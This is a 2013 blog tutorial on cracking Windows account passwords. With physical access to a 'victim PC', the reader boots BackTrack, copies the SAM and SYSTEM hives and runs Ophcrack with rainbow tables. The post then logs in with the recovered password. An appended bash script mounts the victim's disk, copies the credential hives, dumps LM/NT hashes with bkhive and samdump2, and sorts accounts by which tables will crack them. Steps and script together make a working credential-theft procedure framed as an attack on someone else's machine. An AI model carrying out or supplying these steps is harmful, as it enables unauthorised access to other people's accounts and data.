Tuesday, March 12, 2013

Windows password cracking

I probably should have done this post first, because what you do here can be reused in the previous hack, which relies on the same rainbow tables. Using Ophcrack you can crack the account passwords of almost all Windows versions currently used in industry (I have not tested Windows 8, but it should work too: the "draw your password" picture sign-in still sits on top of a normal account password, and it is that password's hash that lives in the SAM). Because Ophcrack looks passwords up in precomputed tables instead of brute-forcing them, a password that the tables cover usually falls in minutes, well under 30; a password outside the tables' coverage will not be found at all, however long you wait. So let's begin:

What Do You Need?
BackTrack 5 Live DVD/USB.
Rainbow tables (I'll tell you what they are).
Physical access to the victim PC (you will boot it from your own media).

So What-The-Hell Are Rainbow Tables?
The first thing that pops into mind when reading "rainbow files" is a collection of rainbows and unicorns flying (sarcasm), but no: rainbow tables are huge sets of precomputed chains of hash values that let you look up which plaintext produces a given hash, trading disk space for the time a brute-force search would take. They are specific to one hash function, which matters here: Windows stores up to two hashes per account, the old LM hash (on by default up to XP) and the NT hash (present on every version, and the only one stored by default from Vista on), so the tables must match the hash type you are attacking. Neither hash is salted, which is exactly why a precomputed table works. It's also possible for two different inputs to produce the same hash, so it isn't important to recover the password the user actually typed; any string with the same hash will log you in.

So What Do I Need To Do?
You need to download the rainbow tables that match the hash type of your victim's OS version. Get them here (the Ophcrack project's tables page). The smaller free tables will do unless the victim's password is longer or more complex than the table covers; each table's description lists the character set and password length it was built for.
NOTE: the Vista tables work for Windows 7 and Windows 8 too, because all three store only the NT hash by default. The XP tables target the LM hash and will not help against a Vista or later machine.

Once everything is downloaded and ready, put the rainbow tables on a flash drive.

Let's begin;
Step 1:
Boot the victim PC from the BackTrack Live DVD/USB. Remember to start the GUI (startx) once you get a shell prompt.

Step 2:
Mount the victim's Windows partition read-only (BackTrack does not mount it for you) and navigate to the directory where the Windows password hives are stored.
Usually: Windows/System32/config/ (WINDOWS/system32/config/ on XP; Linux paths are case-sensitive, so check the exact spelling).

Step 3:
Locate the files "SAM" and "SYSTEM" and copy both to a new folder on the BackTrack desktop. Both are needed: SYSTEM holds the boot key that the SAM hashes are encrypted with, so a SAM on its own is useless.

Step 4:
Run the Ophcrack tool in BackTrack via: Start -> BackTrack -> Privilege Escalation -> Password Attacks -> Offline Attacks -> Ophcrack GUI.

Step 5:
Go to "Load" and select "Encrypted SAM" in Ophcrack. It asks for the directory that contains the SAM and SYSTEM files; select the new folder on the desktop where you saved them. Ophcrack then lists every local account with its LM and NT hashes.

Step 6:
Target the Administrator account and delete the other accounts from the list (if any), so the tables are only searched for the hash you care about. An account whose NT hash shows as "empty" has no password at all and needs no cracking.

Step 7:
Plug in the pen drive/flash drive and extract the rainbow tables to the desktop.

Step 8:
Click the "Tables" button in Ophcrack. Select the table set you downloaded, click "Install", point it at the directory where you extracted the tables, and click OK. A green or yellow mark next to the table means Ophcrack found it.

Step 9:
Now hit the "Crack" button and wait a few minutes; if the password is covered by the tables it appears in the "NT Pwd" (or "LM Pwd") column. If it does not, the password is outside the table's coverage and a bigger table is your next step. Reboot the machine into Windows and log in with the recovered password to test.
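The same hive grab from the BackTrack terminal, plus the check I always do before loading tables: dump the hashes and look at the LM field, because that decides whether the XP (LM) or the Vista (NT) tables apply. This is an added example and not code from the original post. It assumes (none of which the post states) that the Windows system partition is /dev/sda1, that the hives sit under Windows/System32/config (or WINDOWS/system32/config on XP), and that the BackTrack 5 era bkhive + samdump2 pair is used to produce pwdump-format lines; the sample hash lines at the bottom are constructed.

```bash
#!/bin/bash
# Added example, not code from the original post: Steps 2-3 from the shell,
# followed by a triage of the dumped hashes so you know which rainbow tables
# to load before pressing Crack.
#
# Assumptions (not stated on the page): Windows system partition is /dev/sda1,
# hives live under <drive>/Windows/System32/config (WINDOWS/system32/config on
# XP), and hashes are dumped with BackTrack 5's bkhive + samdump2 (newer
# samdump2 releases use "samdump2 SYSTEM SAM" instead).

WIN_DEV="${WIN_DEV:-/dev/sda1}"
MNT="${MNT:-/mnt/win}"
WORK="${WORK:-$HOME/Desktop/sam}"

# What Windows writes in the LM field when LM hashing is disabled (the default
# from Vista on): the LM hash of the empty string, not a crackable hash.
EMPTY_LM="aad3b435b51404eeaad3b435b51404ee"
# NT hash of the empty string: the account has no password at all.
EMPTY_NT="31d6cfe0d16ae931b73c59d7e0c089c0"

# Copy SAM and SYSTEM off the victim disk and dump the hashes in pwdump format.
# Not run automatically; call it on the live BackTrack box.
dump_hashes() {
    mkdir -p "$MNT" "$WORK"
    # Read-only mount: nothing on the victim disk needs to change.
    mount -t ntfs-3g -o ro "$WIN_DEV" "$MNT"
    # Linux paths are case-sensitive and the hive directory and file names are
    # spelled differently across Windows versions, so look them up ignoring case.
    cfg=$(find "$MNT" -maxdepth 3 -type d -ipath '*/system32/config' | head -n 1)
    sam=$(find "$cfg" -maxdepth 1 -iname sam | head -n 1)
    sys=$(find "$cfg" -maxdepth 1 -iname system | head -n 1)
    cp "$sam" "$WORK/SAM"
    cp "$sys" "$WORK/SYSTEM"
    umount "$MNT"
    bkhive "$WORK/SYSTEM" "$WORK/syskey.txt"                      # boot key from SYSTEM
    samdump2 "$WORK/SAM" "$WORK/syskey.txt" > "$WORK/hashes.txt"  # user:rid:LM:NT::: lines
}

# Triage one pwdump line (user:rid:LMhash:NThash:::) and print "user<TAB>verdict".
classify_line() {
    local user rid lm nt rest
    IFS=: read -r user rid lm nt rest <<EOF
$1
EOF
    lm=$(printf '%s' "$lm" | tr 'A-F' 'a-f')
    nt=$(printf '%s' "$nt" | tr 'A-F' 'a-f')
    if [ "$nt" = "$EMPTY_NT" ]; then
        printf '%s\tEMPTY: no password set, nothing to crack\n' "$user"
    elif [ -z "$lm" ] || [ "$lm" = "$EMPTY_LM" ]; then
        printf '%s\tNT-only: load the Vista/NT tables (XP LM tables are useless here)\n' "$user"
    else
        printf '%s\tLM+NT: the XP LM tables apply and are the fastest route\n' "$user"
    fi
}

# Triage a whole pwdump dump read from stdin, skipping blank and comment lines.
classify_hashes() {
    local line
    while IFS= read -r line; do
        case "$line" in ""|"#"*) continue ;; esac
        classify_line "$line"
    done
}

# Constructed sample dump for illustration. The NT/LM values are the widely
# published hashes of the string "password"; "legacy" stands for an XP-style
# account that still has an LM hash, and Guest has no password.
SAMPLE_HASHES='Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
legacy:1001:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::'

# On the live box, after dump_hashes:  classify_hashes < "$WORK/hashes.txt"
printf '%s\n' "$SAMPLE_HASHES" | classify_hashes
```

If you go this route, load the resulting hashes.txt in Ophcrack with Load -> "PWDUMP file" instead of "Encrypted SAM"; the rest of the steps are unchanged. The triage is the point: a machine whose accounts all show the aad3b435... LM field is an NT-only target, and spending an hour on the XP tables against it finds nothing.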